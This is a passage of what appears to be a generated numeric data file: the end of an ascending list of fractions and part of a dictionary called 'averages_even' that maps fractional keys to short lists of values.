0.854272959184, 0.855867346939, 0.856823979592, 0.857142857143, 0.859375, 0.860969387755, 0.866071428571, 0.867028061224, 0.872130102041, 0.872448979592, 0.874681122449, 0.877232142857, 0.88137755102, 0.882653061224, 0.884885204082, 0.887755102041, 0.889987244898, 0.891581632653, 0.892538265306, 0.892857142857, 0.895089285714, 0.896683673469, 0.901785714286, 0.902742346939, 0.907844387755, 0.908163265306, 0.910395408163, 0.912946428571, 0.917091836735, 0.918367346939, 0.920599489796, 0.923469387755, 0.925701530612, 0.927295918367, 0.92825255102, 0.928571428571, 0.930803571429, 0.932397959184, 0.9375, 0.938456632653, 0.943558673469, 0.94387755102, 0.946109693878, 0.948660714286, 0.952806122449, 0.954081632653, 0.95631377551, 0.959183673469, 0.961415816327, 0.963010204082, 0.963966836735, 0.964285714286, 0.966517857143, 0.968112244898, 0.973214285714, 0.974170918367, 0.979272959184, 0.979591836735, 0.981823979592, 0.984375, 0.988520408163, 0.989795918367, 0.992028061224, 0.994897959184, 0.997130102041, 0.998724489796, 0.999681122449]
averages_even={0.0: [0.5, 0.0], 0.109375: [0.875, 0.125], 0.1875: [0.25, 0.75], 0.392857142857: [0.5, 0.0], 0.127232142857: [0.375, 0.625], 0.188456632653: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.209183673469: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.744897959184: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.856823979592: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.5: [0.5, 0.0], 0.946109693878: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.657844387755: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.03443877551: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.244897959184: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.354272959184: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.535714285714: [0.5, 0.0], 0.473214285714: [0.75, 0.25], 0.78443877551: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.753826530612: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.59693877551: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.537946428571: [0.875, 0.125], 0.813456632653: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.780612244898: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.015306122449: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.488520408163: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.999681122449: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.559948979592: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.382653061224: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.651785714286: [0.75, 0.25], 0.009885204082: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 
0.823660714286: [0.875, 0.125], 0.6875: [0.75, 0.25], 0.412946428571: [0.375, 0.625], 0.882653061224: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.502232142857: [0.875, 0.125], 0.270089285714: [0.375, 0.625], 0.08131377551: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.75: [0.5, 0.0], 0.104272959184: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.973214285714: [0.75, 0.25], 0.443558673469: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.713010204082: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.253826530612: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.887755102041: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.035714285714: [0.5, 0.0], 0.287946428571: [0.875, 0.125], 0.142538265306: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.892857142857: [0.5, 0.0], 0.238520408163: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.345663265306: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.561224489796: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.680803571429: [0.875, 0.125], 0.177295918367: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.988520408163: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.259885204082: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.454081632653: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.45631377551: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.377232142857: [0.375, 0.625], 0.19387755102: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.580357142857: [0.75, 0.25], 0.742028061224: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.032844387755: [0.6964285714286, 0.4464285714286, 0.3035714285714, 
0.5535714285714], 0.981823979592: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.357142857143: [0.5, 0.0], 0.645089285714: [0.875, 0.125], 0.468112244898: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.425701530612: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.277742346939: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.122448979592: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.535395408163: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.258928571429: [0.25, 0.75], 0.086415816327: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.588966836735: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.372448979592: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.938456632653: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.867028061224: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.355867346939: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.366071428571: [0.75, 0.25], 0.294642857143: [0.25, 0.75], 0.713966836735: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.464285714286: [0.5, 0.0], 0.017538265306: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.313456632653: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.738520408163: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.854272959184: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.606823979592: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.675701530612: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.948660714286: [0.375, 0.625], 0.389987244898: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.020089285714: [0.375, 0.625], 0.67825255102: 
[0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.384885204082: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.359375: [0.875, 0.125], 0.265306122449: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.770089285714: [0.375, 0.625], 0.099170918367: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.575255102041: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.289540816327: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.395089285714: [0.875, 0.125], 0.917091836735: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.821428571429: [0.5, 0.0], 0.658163265306: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.927295918367: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.178571428571: [0.5, 0.0], 0.670599489796: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.352040816327: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.311224489796: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.014987244898: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.213010204082: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.729272959184: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.709183673469: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.071109693878: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.229272959184: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.604272959184: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.09693877551: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.821109693878: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.338966836735: [0.0178571428571, 0.2678571428571, 
0.7321428571429, 0.9821428571429], 0.461415816327: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.652742346939: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.723214285714: [0.75, 0.25], 0.231823979592: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.066326530612: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.55325255102: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.275510204082: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.452806122449: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.157844387755: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.989795918367: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.002232142857: [0.875, 0.125], 0.624681122449: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.336734693878: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.489795918367: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.84693877551: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.05325255102: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.63137755102: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.800701530612: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.525510204082: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.420599489796: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.039540816327: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.9375: [0.75, 0.25], 0.678571428571: [0.5, 0.0], 0.080357142857: [0.25, 0.75], 0.151785714286: [0.25, 0.75], 0.866071428571: [0.75, 0.25], 0.80325255102: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.320153061224: [0.0357142857143, 
0.9642857142857, 0.5357142857143, 0.4642857142857], 0.198660714286: [0.375, 0.625], 0.202806122449: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.627232142857: [0.375, 0.625], 0.774234693878: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.479591836735: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.739795918367: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.563456632653: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.891581632653: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.497130102041: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.545599489796: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.162946428571: [0.375, 0.625], 0.908163265306: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.711415816327: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.050701530612: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.896683673469: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.860969387755: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.902742346939: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.765306122449: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.282844387755: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.463966836735: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.356823979592: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.360969387755: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.702806122449: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.794642857143: [0.75, 0.25], 0.830357142857: [0.75, 0.25], 0.928571428571: [0.5, 0.0], 0.923469387755: [0.5714285714286, 
0.4285714285714, 0.9285714285714, 0.0714285714286], 0.204081632653: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.918367346939: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.677295918367: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.401785714286: [0.75, 0.25], 0.146683673469: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.025510204082: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.836734693878: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.747130102041: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.38137755102: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.063456632653: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.855867346939: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.418367346939: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.168367346939: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.474170918367: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.239795918367: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.196109693878: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.752232142857: [0.875, 0.125], 0.825255102041: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.789540816327: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.816326530612: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.106823979592: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.075255102041: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.027742346939: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.550701530612: [0.9464285714286, 0.1964285714286, 0.0535714285714, 
0.8035714285714], 0.17825255102: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.402742346939: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.503826530612: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.508928571429: [0.75, 0.25], 0.92825255102: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.595663265306: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.341517857143: [0.375, 0.625], 0.318558673469: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.213966836735: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.423469387755: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.374681122449: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.809948979592: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.599170918367: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.716517857143: [0.875, 0.125], 0.943558673469: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.035395408163: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.438456632653: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.295599489796: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.994897959184: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.145089285714: [0.875, 0.125], 0.729591836735: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.609375: [0.875, 0.125], 0.229591836735: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.494897959184: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.309948979592: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.857142857143: [0.5, 0.0], 0.4375: [0.75, 0.25], 0.852040816327: [0.5714285714286, 0.4285714285714, 
0.9285714285714, 0.0714285714286], 0.484375: [0.375, 0.625], 0.895089285714: [0.875, 0.125], 0.524234693878: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.158163265306: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.642857142857: [0.5, 0.0], 0.321109693878: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.952806122449: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.285714285714: [0.5, 0.0], 0.408163265306: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.660395408163: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.966517857143: [0.875, 0.125], 0.872448979592: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.070153061224: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.141581632653: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.446109693878: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.998724489796: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.330357142857: [0.75, 0.25], 0.44387755102: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.008928571429: [0.25, 0.75], 0.910395408163: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.968112244898: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.83131377551: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.105867346939: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.963010204082: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.764987244898: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.805803571429: [0.625, 0.375], 0.030612244898: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.305803571429: [0.375, 0.625], 0.134885204082: [0.4107142857143, 0.1607142857143, 
0.5892857142857, 0.8392857142857], 0.731823979592: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.573660714286: [0.875, 0.125], 0.591517857143: [0.375, 0.625], 0.055803571429: [0.375, 0.625], 0.142857142857: [0.5, 0.0], 0.13137755102: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.734375: [0.375, 0.625], 0.28443877551: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.059948979592: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.170599489796: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.872130102041: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.068558673469: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.110969387755: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.718112244898: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.877232142857: [0.375, 0.625], 0.264987244898: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.173469387755: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.336415816327: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.795599489796: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.073660714286: [0.875, 0.125], 0.801020408163: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.704081632653: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.285395408163: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.137755102041: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.30325255102: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.300701530612: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.874681122449: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.095663265306: [0.8928571428571, 
0.3928571428571, 0.6071428571429, 0.1071428571429], 0.061224489796: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.838966836735: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.387755102041: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.044642857143: [0.25, 0.75], 0.180803571429: [0.875, 0.125], 0.901785714286: [0.75, 0.25], 0.696109693878: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.223214285714: [0.75, 0.25], 0.463010204082: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.051020408163: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.20631377551: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.182397959184: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.224170918367: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.193558673469: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.820153061224: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.53443877551: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.107142857143: [0.5, 0.0], 0.992028061224: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.748724489796: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.132653061224: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.954081632653: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.961415816327: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.124681122449: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.247130102041: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.566326530612: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.242028061224: [0.4107142857143, 0.1607142857143, 0.5892857142857, 
0.8392857142857], 0.167091836735: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.698660714286: [0.375, 0.625], 0.641581632653: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.845663265306: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.69387755102: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.515306122449: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.785714285714: [0.5, 0.0], 0.964285714286: [0.5, 0.0], 0.527742346939: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.639987244898: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.997130102041: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.139987244898: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.116071428571: [0.25, 0.75], 0.071428571429: [0.5, 0.0], 0.634885204082: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.767538265306: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.391581632653: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.642538265306: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.811224489796: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.417091836735: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.920599489796: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.122130102041: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.859375: [0.875, 0.125], 0.932397959184: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.622448979592: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.252232142857: [0.875, 0.125], 0.724170918367: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.787946428571: [0.875, 0.125], 0.782844387755: 
[0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.551020408163: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.586734693878: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.396683673469: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.963966836735: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.479272959184: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.514987244898: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.34693877551: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.428571428571: [0.5, 0.0], 0.974170918367: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.249681122449: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.216517857143: [0.875, 0.125], 0.925701530612: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.979591836735: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.530612244898: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.33131377551: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.884885204082: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.367028061224: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.539540816327: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.152742346939: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.602040816327: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.775510204082: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.372130102041: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.979272959184: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.617028061224: [0.9107142857143, 0.0892857142857, 
0.6607142857143, 0.3392857142857], 0.492028061224: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.607142857143: [0.5, 0.0], 0.662946428571: [0.375, 0.625], 0.321428571429: [0.5, 0.0], 0.605867346939: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.325255102041: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.930803571429: [0.875, 0.125], 0.175701530612: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.610969387755: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.091517857143: [0.375, 0.625], 0.759885204082: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.616071428571: [0.75, 0.25], 0.410395408163: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.892538265306: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.849170918367: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.688456632653: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.160395408163: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.520089285714: [0.375, 0.625], 0.466517857143: [0.875, 0.125], 0.117028061224: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.818558673469: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.984375: [0.625, 0.375], 0.509885204082: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.498724489796: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.045599489796: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.912946428571: [0.625, 0.375], 0.481823979592: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.407844387755: [0.9464285714286, 0.1964285714286, 